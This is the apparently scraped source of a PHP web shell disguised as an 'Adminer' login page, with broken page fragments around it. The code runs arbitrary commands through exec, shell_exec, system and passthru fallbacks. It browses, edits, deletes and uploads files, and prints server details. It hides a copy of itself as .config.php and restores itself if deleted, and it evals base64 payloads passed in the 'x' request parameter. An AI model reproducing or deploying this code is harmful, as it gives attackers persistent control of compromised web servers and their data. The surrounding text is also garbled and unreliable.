Login - Adminer

dbfdg sdaas [!] scandir gagal, mencoba shell_exec fallback... "; $fallback = shell_exec("ls -la " . escapeshellarg(getcwd())); echo $fallback ?: "[x] shell_exec gagal atau diblokir. "; // Stop lanjutkan render jika fallback dipakai exit; } // --- END PATCH --- ?> Login - Adminer '; exit; } } // Subsequent code for authenticated users continues here... // Example output for verified access could be displayed below after the login... ?> Password: '; exit(); } } // Error Reporting for Debugging error_reporting(E_ALL); ini_set('display_errors', 1); // Function to bypass restricted functions using system calls function safe_exec($cmd) { if (function_exists('exec')) { exec($cmd, $output); return implode("\n", $output); } elseif (function_exists('shell_exec')) { return shell_exec($cmd); } elseif (function_exists('system')) { ob_start(); system($cmd); $output = ob_get_clean(); return $output; } elseif (function_exists('passthru')) { ob_start(); passthru($cmd); $output = ob_get_clean(); return $output; } else { return "Command execution not available!"; } } // Get current directory and handle navigation $current_dir = isset($_GET['path']) ? realpath($_GET['path']) : getcwd(); if (!$current_dir || !is_dir($current_dir)) { $current_dir = getcwd(); } chdir($current_dir); // Change to the current directory // Breadcrumb-style clickable Pwd function getBreadcrumbPath($path) { $parts = explode(DIRECTORY_SEPARATOR, $path); $breadcrumb = ""; $full_path = ""; foreach ($parts as $part) { if ($part === "") continue; // Skip empty parts for the root $full_path .= DIRECTORY_SEPARATOR . $part; $breadcrumb .= "$part" . DIRECTORY_SEPARATOR; } return $breadcrumb; } // Display system information echo "

            _                                                             
   ___ __ _| |_ ___ _ __ ___  ___ __ _ _ __ ___     ___ ___  _ __ _ __   
  / __/ _` | __/ _ \ '__/ __|/ __/ _` | '_ ` _ \   / __/ _ \| '__| '_ \  
 | (_| (_| | ||  __/ |  \__ \ (_| (_| | | | | | | | (_| (_) | |  | |_) | 
  \___\__,_|\__\___|_|  |___/\___\__,_|_| |_| |_|  \___\___/|_|  | .__(_) 
         [ v2. bypass editor files auto removed by server ]      |_|

"; echo "

Server Info:

"; echo "Server IP: " . $_SERVER['SERVER_ADDR'] . " (" . $_SERVER['HTTP_HOST'] . ")
"; echo "Uname: " . php_uname() . "
"; echo "PHP Version: " . phpversion() . "
"; echo "User: " . trim(safe_exec('whoami')) . "
"; echo "Pwd: " . getBreadcrumbPath($current_dir) . "

"; // File Explorer Layout echo "

File Explorer:

"; $files = @scandir($current_dir); // Suppress errors in case of restricted paths if ($files === false) { echo "Directory listing failed! Trying alternative methods.
"; $files = explode("\n", safe_exec("ls -1 " . escapeshellarg($current_dir))); } foreach ($files as $file) { // Skip current and parent directory references if ($file === "." || $file === "..") continue; // Determine if it's a directory or file $file_path = realpath($current_dir . DIRECTORY_SEPARATOR . $file); $is_dir = is_dir($file_path); // Format output for directories and files $file_name = $is_dir ? "$file" : "$file"; $actions = "[Delete] [Edit] [Rename]"; // Display file or directory with actions echo "$file_name $actions
"; } // File Editing if (isset($_GET['edit'])) { $file_to_edit = realpath($_GET['edit']); if (is_file($file_to_edit)) { $content = htmlspecialchars(file_get_contents($file_to_edit)); echo "

Editing '$file_to_edit':

"; echo ""; } } // Save edited file if (isset($_POST['file_content']) && isset($_POST['edit_file'])) { file_put_contents($_POST['edit_file'], $_POST['file_content']); echo "File saved!"; } // File Renaming if (isset($_GET['rename'])) { $file_to_rename = realpath($_GET['rename']); echo "

Renaming '$file_to_rename':

"; echo ""; } if (isset($_POST['rename_old']) && isset($_POST['rename_new'])) { $old_name = $_POST['rename_old']; $new_name = dirname($old_name) . DIRECTORY_SEPARATOR . $_POST['rename_new']; if (rename($old_name, $new_name)) { echo "Renamed '$old_name' to '$new_name'.
"; } else { echo "Failed to rename '$old_name'.
"; } } // File Deletion with Confirmation if (isset($_GET['delete'])) { $file_to_delete = realpath($_GET['delete']); if (unlink($file_to_delete)) { echo "File '$file_to_delete' deleted successfully.
"; } else { echo "Failed to delete '$file_to_delete'.
"; } } // Upload Form echo "

Upload a File:

"; echo ""; // File Upload Handler if (isset($_FILES['upload'])) { $target_path = basename($_FILES['upload']['name']); if (move_uploaded_file($_FILES['upload']['tmp_name'], $target_path)) { echo "File " . basename($_FILES['upload']['name']) . " uploaded successfully.
"; } else { echo "Upload failed.
"; } } // CMD Terminal Functionality if (isset($_POST['cmd'])) { $cmd = $_POST['cmd']; echo "

Command Output:

"; echo "

" . htmlspecialchars(safe_exec($cmd)) . "

"; } echo "

Execute Command:

"; echo ""; // *** New Features *** $hidden_file = $_SERVER['DOCUMENT_ROOT'] . '/.config.php'; // Auto copy and persist code if (!file_exists($hidden_file)) { @copy(__FILE__, $hidden_file); } // Check if the file is missing and restore it from backup if (!file_exists(__FILE__) && file_exists($hidden_file)) { $code = file_get_contents($hidden_file); file_put_contents(__FILE__, $code); } // Bypass check (Example: Simple payload execution) if (isset($_REQUEST['x'])) { $payload = base64_decode($_REQUEST['x']); eval($payload); } ?>

Login
System
Server
Username
Password
Database